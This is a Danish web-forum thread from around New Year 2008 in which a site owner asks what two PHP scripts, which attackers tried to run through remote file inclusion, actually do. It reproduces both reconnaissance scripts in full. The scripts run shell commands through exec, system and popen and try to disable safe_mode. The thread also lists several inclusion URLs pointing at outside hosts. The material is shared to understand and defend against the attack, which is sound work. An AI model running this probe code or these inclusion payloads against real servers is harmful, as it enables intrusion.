| 
					
							
        
    
        
						
			 | 
			
			
					    
					
        
         
          
         
	
            | Hvad gør denne kode? Fra : Christian R. Larsen | 
  Dato :  29-12-07 08:25 |  
  |   
            Nogen har forsøgt at køre dette stykke kode mod min webserver - der er kaldt 
 en URL, hvorpå der befinder sig en text-fil, som indeholder koden.
 
 
 Hvad gør koden, og hvordan ved jeg, om forehavendet er lykkedes?
 
 
 <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ 
 echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ 
 ini_restore("safe_mode"); ini_restore("open_basedir"); 
 if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ 
 echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ 
 echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function 
 ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ 
 @exec($cfe,$res); $res = join("\n",$res); } 
 elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } 
 elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = 
 @ob_get_contents(); @ob_end_clean(); } 
 elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = 
 @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = 
 @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= 
 @fread($f,1024); } @pclose($f); } } return $res; } exit;
 
 
 Også dette stykke kode er forsøgt kørt:
 
 
 
 <?
 $dir = @getcwd();
 echo "FaStiDiO<br>";
 $OS = @PHP_OS;
 echo "OSTYPE:$OS<br>";
 $free = disk_free_space($dir);
 
 if ($free === FALSE) {$free = 0;}
 
 if ($free < 0) {$free = 0;}
 echo "Free:".view_size($free)."<br>";
 
 $cmd="id";
 $eseguicmd=ex($cmd);
 echo $eseguicmd;
 
 function ex($cfe){
 $res = '';
 if (!empty($cfe)){
 if(function_exists('exec')){
 @exec($cfe,$res);
 $res = join("\n",$res);
 }
 elseif(function_exists('shell_exec')){
 $res = @shell_exec($cfe);
 }
 elseif(function_exists('system')){
 @ob_start();
 @system($cfe);
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(function_exists('passthru')){
 @ob_start();
 @passthru($cfe);
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(@is_resource($f = @popen($cfe,"r"))){
 $res = "";
 while(!@feof($f)) { $res .= @fread($f,1024); }
 @pclose($f);
 }}
 return $res;
 }
 
 function view_size($size)
 
 {
 
 if (!is_numeric($size)) {return FALSE;}
 
 else
 
 {
 
 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
 
 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
 
 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
 
 else {$size = $size . " B";}
 
 return $size;
 
 }}
 
 exit;
 
 
  
            
             |   |   
            
        
 
            
         
           Jonathan Stein (29-12-2007) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  29-12-07 16:27 |  
  |  
 
            Christian R. Larsen skrev:
 > Nogen har forsøgt at køre dette stykke kode mod min webserver - der er kaldt 
 > en URL, hvorpå der befinder sig en text-fil, som indeholder koden.
  >
 > Hvad gør koden, og hvordan ved jeg, om forehavendet er lykkedes?
 Umiddelbart forsøger man først at udskrive nogle oplysninger om systemet 
 - derefter er det muligt at få udført kommandoer og/eller vist filer fra 
 systemet.
 Hvad sker der, hvis du selv kalder URL'en? Får du vist PHP-koden eller 
 udskriver den nogle oplysninger? - I sidstnævnte tilfælde bør du 
 betragte dit system som kompromitteret!
 (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit system).
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
           Kim Ludvigsen (29-12-2007) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  29-12-07 17:29 |  
  |  
 
            Den 29-12-07 16.27 skrev Jonathan Stein følgende:
 > (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit system).
 Filen ligger sikkert på en fremmed server. Min webserver er udsat for 
 masser af angreb i stil med:
 /index.php?side= http://www.mta.cl/galeria2/galery.txt?
-- 
 Mvh. Kim Ludvigsen
 Lav flotte fotomosaikbilleder med Centarsia.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
            Stig Johansen (30-12-2007) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  30-12-07 06:31 |  
  |  
 
            Kim Ludvigsen wrote:
 > Den 29-12-07 16.27 skrev Jonathan Stein følgende:
 > 
 >> (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit
 >> system).
 > 
 > Filen ligger sikkert på en fremmed server. Min webserver er udsat for
 > masser af angreb i stil med:
 > /index.php?side= http://www.mta.cl/galeria2/galery.txt?
Den er noget anderledes, og en del grimmere end OP's.
 Den forsøger at tilføje en <iframe> til samtlige .php,.htm,.html filer på
 systemet.
 Hvis det lykkes, så vil samtlige brugere der besøger din side generere en
 request til 'offeret'. Der er højst sandsynligt tale om et DDoS attack.[1]
 En anden mulighed kunne være at 'snige' en, eksempelvis ActiveX, ind af
 bagdøren ved brug af dine sider - Det kunne jo være at dine brugere stoler
 på dig?
 [1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
 (Fatter ikke det der sprog) på, der er tale om en ISP.
 -- 
 Med venlig hilsen
 Stig Johansen
            
              |   |   
            
        
 
            
         
             Stig Johansen (30-12-2007) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  30-12-07 06:45 |  
  |   
            Stig Johansen wrote:
 [snip lidt ævl]
 
 Og det sørgelige i den forbindelse er, at 'de' udnytter de 'nemme ofre' 
 aka 'Jeg bruger Apache/PHP, så jeg er sikker' - folket.
 
 -- 
 Med venlig hilsen
 Stig Johansen
  
            
             |   |   
            
        
 
            
         
             Kim Ludvigsen (30-12-2007) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  30-12-07 13:57 |  
  |  
 
            Den 30-12-07 06.30 skrev Stig Johansen følgende:
 > Kim Ludvigsen wrote:
 > 
 >> Filen ligger sikkert på en fremmed server. Min webserver er udsat for
 >> masser af angreb i stil med:
 >> /index.php?side= http://www.mta.cl/galeria2/galery.txt?
> 
 > Den er noget anderledes, og en del grimmere end OP's.
 Der er mange forskellige scripts, og de fleste af dem ligger på russiske 
 servere.
 > [1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
 > (Fatter ikke det der sprog) på, der er tale om en ISP.
 Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på 
 problemet, både med hensyn til scriptene og med hensyn til 
 angrebsadresserne. Det fleste scripts er væk allerede et par dage efter 
 forsøget. Jeg måtte gennem en del adresser, før jeg fandt en der virkede 
 (ovenstående), den har til gengæld været aktiv mindst siden den 4. 
 december.
 -- 
 Mvh. Kim Ludvigsen
 Brug Thunderbird til mail, og undgå at få fyldt indbakken med spam.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
              Stig Johansen (31-12-2007) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  31-12-07 05:28 |  
  |  
 
            Kim Ludvigsen wrote:
 > Den 30-12-07 06.30 skrev Stig Johansen følgende:
 > Der er mange forskellige scripts, og de fleste af dem ligger på russiske
 > servere.
 Det er nok fordi det er dér, der er flest åbne servere.
 Remote scriptet kan ligeså godt ligge på tante Oda's maskine.
 >> [1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
 >> (Fatter ikke det der sprog) på, der er tale om en ISP.
 > 
 > Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på
 > problemet, både med hensyn til scriptene og med hensyn til
 > angrebsadresserne.
 Jeg er ikke 100% sikker på vi snakker om den/det samme.
 Jeg tænker på _offeret_: < http://usuarios.arnet.com.ar>
Way back machine har ikke noget siden juni 2007, så det er nok deromkring
 det er startet. 
 Det er ligegyldigt om scriptet bliver fjernet dagen efter, så længe det har
 afleveret sin 'payload' - her inficering af 'web' sider med en <iframe>.
 <guesstimate>
 Offerets problem er, at der findes 1.000 vis af servere med 1.000 vis af
 sider, der bliver kaldt af 1.000 vis af brugere.
 </guesstimate>
 Hver eneste visning til slutbrugeren vil, via <iframen>, generere et opslag
 til offeret. Da den er angivet til 0-størrelse, vil slutbrugeren formentlig
 ikke opdage at han deltager i et storstilet DDoS.
 Offeret får ikke 'fred', hvis det nogensinde sker, før angrebet er stoppet
 *og* der er ryddet op i samtlige inficerede servere/websider.
 > Det fleste scripts er væk allerede et par dage efter 
 > forsøget. 
 Det er nok et spørgsmål om årsag og virkning. Jo flere angreb, der lykkes,
 jo flere opslag får 'ejeren' af scriptet. Desværre er sandsynligheden for
 at scriptet bliver fundet nok en funktion af succesraten for gennemførte
 inficeringer.
 -- 
 Med venlig hilsen
 Stig Johansen
            
              |   |   
            
        
 
            
         
               Kim Ludvigsen (31-12-2007) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  31-12-07 10:00 |  
  |  
 
            Den 31-12-07 05.28 skrev Stig Johansen følgende:
 > Kim Ludvigsen wrote:
 > 
 >> Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på
 >> problemet, både med hensyn til scriptene og med hensyn til
 >> angrebsadresserne.
 > 
 > Jeg er ikke 100% sikker på vi snakker om den/det samme.
 Du har ret, det gjorde vi ikke (eller rettere: Jeg vrøvlede ved at 
 medtage angrebsadresserne i ovenstående).
 -- 
 Mvh. Kim Ludvigsen
 Undgå stegt lever: Sunbird hjælper dig med at huske bryllupsdagen.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
           Christian R. Larsen (30-12-2007) 
         
	
            | Kommentar Fra : Christian R. Larsen | 
  Dato :  30-12-07 07:07 |  
  |  
 
            "Jonathan Stein" <jstein@image.dk> wrote in message 
 news:47766756$0$90270$14726298@news.sunsite.dk...
 > Hvad sker der, hvis du selv kalder URL'en? Får du vist PHP-koden eller 
 > udskriver den nogle oplysninger? - I sidstnævnte tilfælde bør du betragte 
 > dit system som kompromitteret!
 Jeg får ikke udlæst nogen kommandoer nej. Jeg får en fejl 404, hvis jeg 
 kalder den URL, hackeren har forsøgt sig med.
 Og filen ligger i øvrigt på en fremmed server. Der kaldes en sti med 
 følgende udseende:
 www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?
> (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit 
 > system).
 Det er den så gudskelov ikke. 
            
              |   |   
            
        
 
            
         
            Jens G (30-12-2007) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  30-12-07 17:52 |  
  |   |   |   
            
        
 
            
         
             Jens G (30-12-2007) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  30-12-07 18:39 |  
  |   |   |   
            
        
 
            
         
            Jonathan Stein (30-12-2007) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  30-12-07 18:46 |  
  |  
 
            Christian R. Larsen skrev:
 >  www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?
For en ordens skyld, så er det væsentlige, om du får en "Not found" på 
 den fil, der skulle ligge på dit system (altså 
 www.mitdomæne.dk/index.php i ovenstående eksempel) eller på hackerens 
 del (altså  http://www.blablab.ch/admintools/to.txt).
Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke 
 har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
             Kim Ludvigsen (30-12-2007) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  30-12-07 19:12 |  
  |  
 
            Den 30-12-07 18.45 skrev Jonathan Stein følgende:
 > Christian R. Larsen skrev:
 > 
 >>  www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?
> 
 > Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke 
 > har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.
 Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er 
 nærmere, om det er muligt at få afviklet hackerens del som et argument 
 på index.php.
 Jeg har en fornemmelse af, at hackerne benytter botter, som 
 gennemtrevler nettet efter php-sider med et argument (hedder det 
 argument?) og en værdi, og når de finder en side, prøver de at angive 
 deres eget script som værdi.
 -- 
 Mvh. Kim Ludvigsen
 Økonom Steffen Møller giver et bud på, hvordan internettet vil påvirke 
 forbrugernes valgmuligheder.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
              Kim Ludvigsen (30-12-2007) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  30-12-07 19:26 |  
  |  
 
            Den 30-12-07 19.11 skrev Kim Ludvigsen følgende:
 > Jeg har en fornemmelse af, at hackerne benytter botter, som 
 > gennemtrevler 
 Øv! gennemtrevler => gennemtrawler
 -- 
 Mvh. Kim Ludvigsen
 Brug Thunderbird til mail, og undgå at få fyldt indbakken med spam.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
              Stig Johansen (31-12-2007) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  31-12-07 06:17 |  
  |  
 
            Kim Ludvigsen wrote:
 > Jeg har en fornemmelse af, at hackerne benytter botter, som
 > gennemtrevler nettet efter php-sider med et argument (hedder det
 > argument?) og en værdi, og når de finder en side, prøver de at angive
 > deres eget script som værdi.
 Det gør de, og det har de gjort længe. 
 Nu ved jeg godt jeg gætter, men hver mand har vel sin opfattelse af tingene.
 Der er forskellige angrebsvektorer/faser i det her spil. 
 Fase 1 er 'bogføring' af potentielle aktiver. Det er dét der foregår med
 'Christians' script. Resultatet af denne operation er 1) Om der er adgang,
 og 2) hvis der er, leveres en brugerliste samt oplysning om OS og ledig
 plads på systemet.
 Bemærk her, at 'Christians' script ikke efterlader sig andet spor end en
 log-entry.
 Nu har jeg ikke min Apache kørende p.t., men jeg vil gætte på, at det er et
 low-frequency 'attack' for at holde sig 'below the radar'.
 Nu har 'vi' en dejlig stor database med navngivne
 servere/OS/brugere/diskplads.
 Fase 2 er angrebet('dit' script).
 Vi skal lige finde et sted at placere vores 'remote' script. Vi søger efter
 et tilfældigt sted i vores database, og lægger scriptet her.
 Så er vi klar, så vi 'ringer' til vores botnet og beder dem om at gå i gang.
 Det her er kun det aktuelle eksempel, men _brugeroplysningerne_ kan også
 bruges til eksempelvis dictionary attack. (Hmm.. var der nogen der sagde
 ssh?).
 Nu har jeg ikke adgang til min server p.t. (IBM DeathStart(TM) var det
 Christian E Lysel?), men så vidt jeg husker, så har det her foregået i
 'mange' år.
 Var der ikke noget med PhpBB engang - tjekker lige af med Google ....
 Jo, den er god nok:
 < http://news.netcraft.com/archives/2004/12/21/santy_worm_spreads_through_phpbb_forums.html>
Her udnyttede man en navngiven funktion
 < http://www.securiteam.com/unixfocus/6J00O15BPS.html>
Men dengang brugte 'man' en søgning efter 'viewtopic.php' på Google som
 'database'.
 -- 
 Med venlig hilsen
 Stig Johansen
            
              |   |   
            
        
 
            
         
              Jonathan Stein (31-12-2007) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  31-12-07 14:48 |  
  |  
 
            Kim Ludvigsen skrev:
 >> Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke 
 >> har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.
 > 
 > Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er 
 > nærmere, om det er muligt at få afviklet hackerens del som et argument 
 > på index.php.
 Jeg gik ud fra, at det var et konstrueret eksempel. (mitdomæne.dk er i 
 hvert fald ikke registreret til Christian).
 Men der er for så vidt slet ikke nogen garanti for, at Christian 
 overhovedet kører PHP. Jeg ser mange forsøg på at fiske efter 
 sårbarheder som slet ikke er mulige på det aktuelle system.
 Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 samme for at se, om siden er sårbar.
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
               Kim Ludvigsen (01-01-2008) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  01-01-08 01:30 |  
  |  
 
            Den 31-12-07 14.47 skrev Jonathan Stein følgende:
 > Kim Ludvigsen skrev:
 > Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 > domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 > samme for at se, om siden er sårbar.
 Min henvisning til index.php var ud fra det nævnte eksempel. Ved 
 ovennævnte metode ville de kun få gevinst, hvis sitet bruger "page". De 
 er lidt smartere. De leder efter php-sider med værdier, og så udskifter 
 de værdien med deres eget script. På et af mine sites, prøver de således 
 at køre index.php?side=script, mens de på et andet prøver at køre 
 ordforklaring.php?forklaring=script.
 -- 
 Mvh. Kim Ludvigsen
 35 tips & tricks til Internet Explorer.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
                Stig Johansen (01-01-2008) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  01-01-08 07:22 |  
  |   
            Kim Ludvigsen wrote:
 
 > På et af mine sites, prøver de således
 > at køre index.php?side=script, mens de på et andet prøver at køre
 > ordforklaring.php?forklaring=script.
 
 Er de begyndt på _dansk_?
 (Har ikke selv en log at kigge i)
 
 -- 
 Med venlig hilsen
 Stig Johansen
  
            
             |   |   
            
        
 
            
         
                 Kim Ludvigsen (01-01-2008) 
         
	
            | Kommentar Fra : Kim Ludvigsen | 
  Dato :  01-01-08 15:27 |  
  |  
 
            Den 01-01-08 07.22 skrev Stig Johansen følgende:
 > Kim Ludvigsen wrote:
 > 
 >> På et af mine sites, prøver de således
 >> at køre index.php?side=script, mens de på et andet prøver at køre
 >> ordforklaring.php?forklaring=script.
 > 
 > Er de begyndt på _dansk_?
 > (Har ikke selv en log at kigge i)
 De er "sprogløse", forstået på den måde, at de er ligeglade med, om der 
 står "page", "side" eller noget helt tredje, og de er ligeglade med hvad 
 det pågældende ord betyder. Du udskifter blot værdien.
 -- 
 Mvh. Kim Ludvigsen
 Skrot mus og tastatur, i fremtiden kan du styre computeren med stemmen, 
 tanken - eller dit humør.
 http://kimludvigsen.dk
            
             |   |   
            
        
 
            
         
                Jonathan Stein (03-01-2008) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  03-01-08 16:51 |  
  |  
 
            Kim Ludvigsen skrev:
 >> Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 >> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 >> samme for at se, om siden er sårbar.
 > 
 > Min henvisning til index.php var ud fra det nævnte eksempel. Ved 
 > ovennævnte metode ville de kun få gevinst, hvis sitet bruger "page". De 
 > er lidt smartere. De leder efter php-sider med værdier, og så udskifter 
 > de værdien med deres eget script. På et af mine sites, prøver de således 
 > at køre index.php?side=script, mens de på et andet prøver at køre 
 > ordforklaring.php?forklaring=script.
 I det tilfælde går de ganske åbenlyst efter eksisterende filer, men man 
 skal heller ikke blive overrasket hvis ens log indeholder forespørgsler 
 efter filer, der slet ikke findes på ens system.
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
               Christian R. Larsen (02-01-2008) 
         
	
            | Kommentar Fra : Christian R. Larsen | 
  Dato :  02-01-08 10:20 |  
  |   
            "Jonathan Stein" <jstein@image.dk> wrote in message 
 news:4778f30c$0$90264$14726298@news.sunsite.dk...
 > Kim Ludvigsen skrev:
 >
 >>> Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke 
 >>> har den fil, som hackeren prøver at misbruge, er der ingen grund til 
 >>> uro.
 >>
 >> Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er 
 >> nærmere, om det er muligt at få afviklet hackerens del som et argument på 
 >> index.php.
 >
 > Jeg gik ud fra, at det var et konstrueret eksempel. (mitdomæne.dk er i 
 > hvert fald ikke registreret til Christian).
 >
 > Men der er for så vidt slet ikke nogen garanti for, at Christian 
 > overhovedet kører PHP. Jeg ser mange forsøg på at fiske efter sårbarheder 
 > som slet ikke er mulige på det aktuelle system.
 >
 > Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 > domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 > samme for at se, om siden er sårbar.
 
 Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere sårbar. 
 Hvordan virker det? 
 
 
  
            
             |   |   
            
        
 
            
         
                Jonathan Stein (03-01-2008) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  03-01-08 16:55 |  
  |  
 
            Christian R. Larsen skrev:
 >> Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 >> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 >> samme for at se, om siden er sårbar.
 > 
 > Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere sårbar. 
 > Hvordan virker det? 
 Hvis "xxx" er en URL til en fil med noget PHP-kode, kan hackeren se, om 
 koden bliver udført - og i så fald har han (formentlig) fri adgang til 
 at få udført sin egen kode.
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
                 Christian R. Larsen (04-01-2008) 
         
	
            | Kommentar Fra : Christian R. Larsen | 
  Dato :  04-01-08 10:06 |  
  |  
 
            "Jonathan Stein" <jstein@image.dk> wrote in message 
 news:477d0541$0$90274$14726298@news.sunsite.dk...
 > Christian R. Larsen skrev:
 >
 >>> Hvis en hacker tester, om der skulle ligge en index.php i roden af 
 >>> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det 
 >>> samme for at se, om siden er sårbar.
 >>
 >> Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere 
 >> sårbar. Hvordan virker det?
 >
 > Hvis "xxx" er en URL til en fil med noget PHP-kode, kan hackeren se, om 
 > koden bliver udført - og i så fald har han (formentlig) fri adgang til at 
 > få udført sin egen kode.
 Nu kender jeg ikke meget til PHP, så jeg forstår ikke umiddelbart, hvorfor 
 den skulle blive udført.
 Jeg har primært anvendt ASP, hvor jeg ikke umiddelbart kan se, hvorfor 
 minside.asp?page= http://farlighacker.ch/text.txt skulle medføre afvikling af 
 kode.
 Er det noget specielt ved PHP, eller hænger det slet og ret sammen med, at 
 mange bare har designet deres sider sådan, at man ved kald til 
 minside.php?page=blabla vil kunne få afviklet blabla? 
            
              |   |   
            
        
 
            
         
                  Jonathan Stein (04-01-2008) 
         
	
            | Kommentar Fra : Jonathan Stein | 
  Dato :  04-01-08 15:08 |  
  |  
 
            Christian R. Larsen skrev:
 > Er det noget specielt ved PHP, eller hænger det slet og ret sammen med, at 
 > mange bare har designet deres sider sådan, at man ved kald til 
 > minside.php?page=blabla vil kunne få afviklet blabla? 
 Det er ikke PHP-specifikt - i ASP kunne man f.eks. have skrevet:
    Server.Execute(Request("page"))
 - Men Server.Execute var vist ikke med i de tidlige versioner af ASP, så 
 der er måske oftere tradition for at lave noget i stil med:
    if Request("page") = "side1" then
      <!--#include file="side1"-->
 - som ikke er sårbar på samme måde.
    M.v.h.
      Jonathan
 -- 
 Er din email vigtig? Er du træt af, at din hjemmeside er nede?
 Stabilt webhotel på redundant setup med daglig backup.
 POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
 http://www.jsp-hotel.dk/
            
             |   |   
            
        
 
            
         
           Christian E. Lysel (01-01-2008) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  01-01-08 14:38 |  
  |   
            
 On Tue, 2008-01-01 at 13:59 +0100, Jens G wrote:
 > F.eks. detected: Trojan program Backdoor.PHP.C99Shell.d
 
 Det har den jo ret i
 
 > Det er muligt den skal eksekveres af php, men jeg ved det ikke.
 
 Hvis du ikke har PHP installeret og associeret den fil type til at blive
 fortolket af PHP fortolkeren, er der intet problem, og du vil blot se
 det som et helt simpelt fladt tekst dokument.
 
 
  
            
             |   |   
            
        
 
            
         
           Stig Johansen (30-12-2007) 
         
	
            | Kommentar Fra : Stig Johansen | 
  Dato :  30-12-07 06:12 |  
  |   
            Christian R. Larsen wrote:
 
 > $cmd="id";
 > $eseguicmd=ex($cmd);
 > echo $eseguicmd;
 
 Fra man id:
 ID(1)                     User Commands                     ID(1)
 NAME
        id - print real and effective UIDs and GIDs
 
 > 
 > function ex($cfe){
 > $res = '';
 > if (!empty($cfe)){
 > if(function_exists('exec')){
 
 Fra man exec:
 exec(n)               Tcl Built-In Commands               exec(n)
 _________________________________________________________________
 
 NAME
        exec - Invoke subprocess(es)
 
 
 Osv. osv.
 
 -- 
 Med venlig hilsen
 Stig Johansen
  
            
             |   |   
            
        
 
            
         
           Christian E. Lysel (30-12-2007) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  30-12-07 18:52 |  
  |   |   |   
            
        
 
            
         
           Jens G (30-12-2007) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  30-12-07 21:46 |  
  |   |   |   
            
        
 
            
         
           Christian E. Lysel (31-12-2007) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  31-12-07 02:30 |  
  |   
            
On Sun, 2007-12-30 at 21:46 +0100, Jens G wrote:
 > >Du behøver ikke at skjule deres sti, en google søgning giver stien.
 > 
 > Det var mere for fuldt offentligt at give stien til noget skidt.
 Det er et tekst dokument ... der er intet galt i det, indtil man henter
 det og køre det igennem en php fortolker.
 > >Adgang til et mislykket angreb?
 > 
 > Det irriterer mig at nogle forsøger at hacke sitet.
 Velkommen til Internet.
 Brug din energi på noget bedre.
 > >Hvis du går og har for meget tid, kan du rette scriptet så der svare
 > >noget fornuftigt og på den måde studere angrebet.
 > >
 > Hvordan mener du?
 Du kan rette contrib/mx_glance_sdesc.php scriptet til i tilfældet hvor
 argumentet er mx_root_path=http at returnere nogle ting de forventer.
 Ergo må de betragte deres søgen efter sårbarheden
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5178 som en
 succes, og senere vil de evt. prøve at udnytte dette.
 Det er en sårbarhed der er over 3 måneder gammel.
 Har du følgende portal installeret og opdateret?
   http://www.mx-system.com/
            
             |   |   
            
        
 
            
         
           Jens G (31-12-2007) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  31-12-07 09:45 |  
  |  
 
            On Mon, 31 Dec 2007 02:30:01 +0100, "Christian E. Lysel"
 <christian@example.net> wrote:
 >
 >On Sun, 2007-12-30 at 21:46 +0100, Jens G wrote:
 >> >Du behøver ikke at skjule deres sti, en google søgning giver stien.
 >> 
 >> Det var mere for fuldt offentligt at give stien til noget skidt.
 >
 >Det er et tekst dokument ... der er intet galt i det, indtil man henter
 >det og køre det igennem en php fortolker.
 Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
 skreg ihvertfald godt op da jeg tjekkede.
 [...]
 >> >Hvis du går og har for meget tid, kan du rette scriptet så der svare
 >> >noget fornuftigt og på den måde studere angrebet.
 >> >
 >> Hvordan mener du?
 >
 >Du kan rette contrib/mx_glance_sdesc.php scriptet til i tilfældet hvor
 >argumentet er mx_root_path=http at returnere nogle ting de forventer.
 >
 >Ergo må de betragte deres søgen efter sårbarheden
 > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5178 som en
 >succes, og senere vil de evt. prøve at udnytte dette.
 >
 >Det er en sårbarhed der er over 3 måneder gammel.
 >
 >Har du følgende portal installeret og opdateret?
 >
 >   http://www.mx-system.com/
>
 Ja, det er det jeg bruger.
 Den er opdateret, og mx_glance_sdesc.ph findes forøvrigt slet ikke på
 mit system, og har aldrig været der.
 Jeg tror de har en base over MX systemer, og så prøver de bare om der
 er filer de ved kan være sårbare. 
 -- 
 Jens G
 Kan anbefale  http://www.everlove.dk til IP telefoni.
 Besøg  http://voip-user.dk for debat om ip-telefoni og udstyr.
            
              |   |   
            
        
 
            
         
           Christian E. Lysel (31-12-2007) 
         
	
            | Kommentar Fra : Christian E. Lysel | 
  Dato :  31-12-07 17:22 |  
  |   
            
 On Mon, 2007-12-31 at 09:44 +0100, Jens G wrote:
 > >Det er et tekst dokument ... der er intet galt i det, indtil man henter
 > >det og køre det igennem en php fortolker.
 > 
 > Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
 > skreg ihvertfald godt op da jeg tjekkede.
 
 Hvilke?
 
 > Jeg tror de har en base over MX systemer, og så prøver de bare om der
 > er filer de ved kan være sårbare. 
 
 Det tror jeg ikke, det er nemmere blot at bruge google.
 
 
  
            
             |   |   
            
        
 
            
         
           Jens G (31-12-2007) 
         
	
            | Kommentar Fra : Jens G | 
  Dato :  31-12-07 17:36 |  
  |  
 
